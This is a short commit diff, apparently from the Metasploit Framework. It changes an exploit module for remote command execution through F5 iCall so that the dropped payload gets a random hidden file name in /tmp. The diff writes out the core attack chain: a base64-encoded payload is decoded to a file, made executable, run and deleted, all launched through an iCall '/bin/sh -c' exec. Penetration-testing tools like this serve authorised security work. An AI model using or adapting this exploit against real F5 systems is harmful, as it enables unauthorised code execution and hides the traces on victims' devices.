Use random path for payload

Author: jhart-r7

modules/exploits/linux/http/f5_icall_cmd.rb

@@ -55,11 +55,17 @@ def initialize(info = {})
       [
         OptInt.new('INTERVAL', [ true, 'Time interval before the iCall::Handler is called, in seconds', 3 ]),
         OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
-        OptString.new('FILENAME', [false, 'File name of the dropped payload', '.9cdfb439c7876e70']),
+        OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']),
         OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
       ])
   end
 
+  def setup
+    file = datastore['FILENAME']
+    file ||= ".#{Rex::Text.rand_text_alphanumeric(16)}"
+    @payload_path = ::File.join(datastore['PATH'], file)
+  end
+
   def build_xml
     builder = Nokogiri::XML::Builder.new do |xml|
       xml.Envelope do
@@ -226,13 +232,10 @@ def check
 
   def exploit
     # phase 1: create iCall script to create file with payload, execute it and remove it.
-    filepath = datastore['PATH']
-    filename = datastore['FILENAME']
-    dest_file = filepath + '/' + filename
-    register_file_for_cleanup dest_file
+    register_file_for_cleanup @payload_path
 
-    shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{dest_file}; chmod +x #{dest_file};#{dest_file};rm -f #{dest_file})
-    cmd = %(if { ! [file exists #{dest_file}]} { exec /bin/sh -c "#{shell_cmd}"})
+    shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path};rm -f #{@payload_path})
+    cmd = %(if { ! [file exists #{@payload_path}]} { exec /bin/sh -c "#{shell_cmd}"})
 
     arg_max = datastore['ARG_MAX']
     if shell_cmd.size > arg_max